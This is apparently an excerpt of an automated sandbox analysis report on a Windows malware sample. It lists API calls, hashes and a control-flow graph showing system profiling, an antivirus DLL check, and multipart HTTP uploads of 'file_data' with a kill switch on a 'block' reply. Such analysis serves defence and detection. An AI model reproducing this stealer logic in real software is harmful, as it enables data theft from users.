                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcpy
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 907984538-0
                                                                                                                                                                                                                                                    • Opcode ID: 995484ff8835bbb93ff565b4c641ddbc469166401c84752203136c6eed6def95
                                                                                                                                                                                                                                                    • Instruction ID: c007a1a97f84c45d803fdf03a9caebf0f8393248836e03303be44ed31e862b72
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 995484ff8835bbb93ff565b4c641ddbc469166401c84752203136c6eed6def95
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 10118271A00218DBDF21BB64EC85BEE73F8AF48300F410092F915A7242DB34AE45AB60
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00090D49
                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 00090D50
                                                                                                                                                                                                                                                    • GetTimeZoneInformation.KERNEL32(?), ref: 00090D5F
                                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 00090D7D
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Heap$AllocInformationProcessTimeZonewsprintf
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 362916592-0
                                                                                                                                                                                                                                                    • Opcode ID: 201e246ae3e26b914354da7ada59eb693cd846cf6a0324f0e89735fae7bd975a
                                                                                                                                                                                                                                                    • Instruction ID: c61f81c77117dacaa888e8b54464f22874f0b90b6e8fdca27ae5304925ef5fb1
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 201e246ae3e26b914354da7ada59eb693cd846cf6a0324f0e89735fae7bd975a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D8F0E970E02224ABEF00BBB4FC4DBAB77A9AB04724F010296F511DB1D0EB74AD448785
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,000813B9), ref: 00090C5F
                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,000813B9), ref: 00090C66
                                                                                                                                                                                                                                                    • GetUserNameA.ADVAPI32(00000000,000813B9), ref: 00090C7A
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Heap$AllocNameProcessUser
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1206570057-0
                                                                                                                                                                                                                                                    • Opcode ID: 19b12e27b408fedd3f1aecd895deb9dbc066a9d03c0706b0a70d6b816f4924a5
                                                                                                                                                                                                                                                    • Instruction ID: 46f6f6a4854f9c22b358bc9cd775c7e105b34a502e152181573e837e2d540446
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 19b12e27b408fedd3f1aecd895deb9dbc066a9d03c0706b0a70d6b816f4924a5
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 84D012B5214204BBE7406795DC4DFCF76BCD784715F000155B645D2250D5B499448720
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: InfoSystemwsprintf
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2452939696-0
                                                                                                                                                                                                                                                    • Opcode ID: 34170051762bed44882e0262e10a55cc7c14cc1bc92eec3b91dc94465441f61b
                                                                                                                                                                                                                                                    • Instruction ID: 14ae814d50b1fcb73319cdecdc0a9617894559446ec835c8b0bcfd66c61ee550
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 34170051762bed44882e0262e10a55cc7c14cc1bc92eec3b91dc94465441f61b
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1DE06D70D5020D9BCF01EF60EC49AEEB7BCAB04204F4105A69505A7180D670AB899B40
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • lstrcmpiW.KERNEL32(?,?,?,?,?,?,00081503,avghookx.dll,00098544), ref: 000814DF
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrcmpi
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1586166983-0
                                                                                                                                                                                                                                                    • Opcode ID: 3b1bb72c9df4be2e7479d90a394bdc70025f8fa9e2a1d30c7d262fc2874ed4b4
                                                                                                                                                                                                                                                    • Instruction ID: 21f00ad1840d4b5568c7e60a86a9979b763451e775197b2422a8f43977144ce6
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3b1bb72c9df4be2e7479d90a394bdc70025f8fa9e2a1d30c7d262fc2874ed4b4
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 24F03432A00150ABCB20DF59D804AAAFBB8EB43760F257054E84AB3200C730ED12AA98

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 29 85482-85593 call 904e7 call 90519 call 84ab6 call 91e5d lstrlenA call 91e5d call 904e7 * 4 StrCmpCA 48 8559b-855a1 29->48 49 85595 29->49 50 855be-856ce call 91c4a call 905c7 call 9058d call 82920 * 2 call 90609 call 905c7 call 90609 call 9058d call 82920 * 3 call 90609 call 905c7 call 9058d call 82920 * 2 InternetConnectA 48->50 51 855a3-855b8 InternetOpenA 48->51 49->48 52 85e64-85eec call 82920 * 4 call 90519 call 82920 * 3 50->52 118 856d4-85712 HttpOpenRequestA 50->118 51->50 51->52 86 85eee-85f2e call 82920 * 6 call 9d016 52->86 119 85e58-85e5e InternetCloseHandle 118->119 120 85718-8571e 118->120 119->52 121 8573c-85d77 call 90609 call 9058d call 82920 call 905c7 call 9058d call 82920 call 90609 call 9058d call 82920 call 90609 call 9058d call 82920 call 90609 call 9058d call 82920 call 90609 call 9058d call 82920 call 905c7 call 9058d call 82920 call 90609 call 9058d call 82920 call 90609 call 9058d call 82920 call 905c7 call 9058d call 82920 call 90609 call 9058d call 82920 call 90609 call 9058d call 82920 call 90609 call 9058d call 82920 call 90609 call 9058d call 82920 call 90609 call 9058d call 82920 call 90609 call 9058d call 82920 call 90609 call 9058d call 82920 call 905c7 call 9058d call 82920 call 90609 call 9058d call 82920 call 90609 call 9058d call 82920 call 90609 call 9058d call 82920 call 90609 call 9058d call 82920 call 90609 call 9058d call 82920 call 90609 call 9058d call 82920 call 90609 call 9058d call 82920 call 905c7 call 9058d call 82920 call 90609 call 9058d call 82920 call 90609 call 9058d call 82920 call 90609 call 9058d call 82920 call 90609 call 9058d call 82920 lstrlenA * 2 GetProcessHeap HeapAlloc lstrlenA call a7050 lstrlenA call a7050 lstrlenA * 2 call a7050 lstrlenA HttpSendRequestA HttpQueryInfoA 120->121 122 85720-85736 InternetSetOptionA 120->122 309 85d79-85db0 call 904e7 call 82920 * 3 121->309 310 85db5-85dc5 call 91afd 121->310 122->121 309->86 315 85dcb-85dd0 310->315 316 85f2f 310->316 318 85e11-85e2e InternetReadFile 315->318 320 85e30-85e43 StrCmpCA 318->320 321 85dd2-85dda 318->321 323 85e4c-85e52 InternetCloseHandle 320->323 324 85e45-85e46 ExitProcess 320->324 321->320 326 85ddc-85e0c call 90609 call 9058d call 82920 321->326 323->119 326->318
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 000904E7: lstrcpyA.KERNEL32(00000000,00000000,?,0009707B,000B66CD,?,?,?,?,0009858F), ref: 0009050D
                                                                                                                                                                                                                                                      • Part of subcall function 00090519: lstrcpyA.KERNEL32(00000000,?,?,00081D07,?,00097621), ref: 00090538
                                                                                                                                                                                                                                                      • Part of subcall function 00084AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00084AE8
                                                                                                                                                                                                                                                      • Part of subcall function 00084AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00084AEE
                                                                                                                                                                                                                                                      • Part of subcall function 00084AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00084AF4
                                                                                                                                                                                                                                                      • Part of subcall function 00084AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00084B06
                                                                                                                                                                                                                                                      • Part of subcall function 00084AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00084B0E
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(?), ref: 00085519
                                                                                                                                                                                                                                                      • Part of subcall function 00091E5D: CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,00000000,002DE908,?,?,?,000928A1,?,?,00000000), ref: 00091E7D
                                                                                                                                                                                                                                                      • Part of subcall function 00091E5D: GetProcessHeap.KERNEL32(00000000,?,?,?,?,000928A1,?,?,00000000), ref: 00091E8A
                                                                                                                                                                                                                                                      • Part of subcall function 00091E5D: HeapAlloc.KERNEL32(00000000,?,?,?,000928A1,?,?,00000000), ref: 00091E91
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,000B6986,000B697B,000B697A,000B696F), ref: 00085588
                                                                                                                                                                                                                                                    • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 000855AA
                                                                                                                                                                                                                                                    • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 000856C0
                                                                                                                                                                                                                                                    • HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 00085704
                                                                                                                                                                                                                                                    • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00085736
                                                                                                                                                                                                                                                      • Part of subcall function 000905C7: lstrcpyA.KERNEL32(00000000,?,0000000C,000975E9,000B66DA), ref: 000905F5
                                                                                                                                                                                                                                                      • Part of subcall function 000905C7: lstrcatA.KERNEL32(?,?), ref: 000905FF
                                                                                                                                                                                                                                                      • Part of subcall function 0009058D: lstrcpyA.KERNEL32(00000000,?,00000000,000970BA,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 000905BD
                                                                                                                                                                                                                                                      • Part of subcall function 00090609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 0009061D
                                                                                                                                                                                                                                                      • Part of subcall function 00090609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090645
                                                                                                                                                                                                                                                      • Part of subcall function 00090609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090650
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(?,",file_data,000B7850,------,000B7844,?,",000B7838,------,000B782C,2ee1445fc63bc20d0e7966867b13e0e1,",build_id,000B7814,------), ref: 00085C67
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(?), ref: 00085C7A
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00085C92
                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 00085C99
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(?), ref: 00085CA6
                                                                                                                                                                                                                                                    • _memmove.LIBCMT ref: 00085CB4
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(?,?,?), ref: 00085CC9
                                                                                                                                                                                                                                                    • _memmove.LIBCMT ref: 00085CD6
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(?), ref: 00085CE4
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(?,?,00000000), ref: 00085CF2
                                                                                                                                                                                                                                                    • _memmove.LIBCMT ref: 00085D05
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(?,?,00000000), ref: 00085D1A
                                                                                                                                                                                                                                                    • HttpSendRequestA.WININET(?,?,00000000), ref: 00085D2D
                                                                                                                                                                                                                                                    • HttpQueryInfoA.WININET(?,00000013,?,?,00000000), ref: 00085D6F
                                                                                                                                                                                                                                                    • InternetReadFile.WININET(?,?,000007CF,?), ref: 00085E26
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,block), ref: 00085E3B
                                                                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 00085E46
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrlen$Internetlstrcpy$Heap$HttpProcess_memmove$AllocOpenRequestlstrcat$BinaryConnectCrackCryptExitFileInfoOptionQueryReadSendString
                                                                                                                                                                                                                                                    • String ID: ------$"$"$"$"$--$------$------$------$------$2ee1445fc63bc20d0e7966867b13e0e1$ERROR$ERROR$block$build_id$file_data
                                                                                                                                                                                                                                                    • API String ID: 2638065154-3389637935
                                                                                                                                                                                                                                                    • Opcode ID: c34cabecb15d8d83aa381d99d74bf76291e597ce7b81a57b96fee737faf71cca
                                                                                                                                                                                                                                                    • Instruction ID: caa849735064dd546b62c1b4821b2f94ad732d048d481a0a54c7b9de02ae610e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c34cabecb15d8d83aa381d99d74bf76291e597ce7b81a57b96fee737faf71cca
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BF42B231D511699FDF21BB20DC45ADDB3F8BF44300F4585E1A998B7122DB70AE8AAF90

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 000904E7: lstrcpyA.KERNEL32(00000000,00000000,?,0009707B,000B66CD,?,?,?,?,0009858F), ref: 0009050D
                                                                                                                                                                                                                                                      • Part of subcall function 00091DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00091DFD
                                                                                                                                                                                                                                                      • Part of subcall function 000905C7: lstrcpyA.KERNEL32(00000000,?,0000000C,000975E9,000B66DA), ref: 000905F5
                                                                                                                                                                                                                                                      • Part of subcall function 000905C7: lstrcatA.KERNEL32(?,?), ref: 000905FF
                                                                                                                                                                                                                                                      • Part of subcall function 0009058D: lstrcpyA.KERNEL32(00000000,?,00000000,000970BA,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 000905BD
                                                                                                                                                                                                                                                      • Part of subcall function 00090609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 0009061D
                                                                                                                                                                                                                                                      • Part of subcall function 00090609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090645
